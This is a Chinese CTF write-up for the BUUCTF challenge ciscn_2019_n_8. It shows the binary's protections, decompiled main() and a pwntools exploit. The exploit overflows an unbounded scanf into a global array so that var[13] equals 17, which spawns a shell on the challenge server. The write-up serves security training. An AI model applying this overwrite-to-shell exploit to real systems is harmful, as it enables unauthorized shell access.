ciscn 2019 n 8
# ciscn 2019 n 8
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/ciscn_2019_n_8/ciscn_2019_n_8'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [esp-14h] [ebp-20h]
int v5; // [esp-10h] [ebp-1Ch]
var[13] = 0;
var[14] = 0;
init();
puts("What's your name?");
__isoc99_scanf("%s", var, v4, v5);
if ( *(_QWORD *)&var[13] )
{
if ( *(_QWORD *)&var[13] == 17LL )
system("/bin/sh");
else
printf(
"something wrong! val is %d",
var[0],
var[1],
var[2],
var[3],
var[4],
var[5],
var[6],
var[7],
var[8],
var[9],
var[10],
var[11],
var[12],
var[13],
var[14]);
}
else
{
printf("%s, Welcome!\n", var);
puts("Try do something~");
}
return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
# 思路分析
- 漏洞十分明显
__isoc99_scanf为var变量读入数据,var[13]处为17时可获得shell
# exp
from pwn import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/ciscn_2019_n_8/ciscn_2019_n_8'
io = remote('node4.buuoj.cn', 25156)
# io = process(pwnfile)
payload = flat(['a'*4*13, 17])
io.recv()
io.sendline(payload)
io.interactive()
1
2
3
4
5
6
7
8
9
2
3
4
5
6
7
8
9
上次更新: 2022/08/15, 00:29:49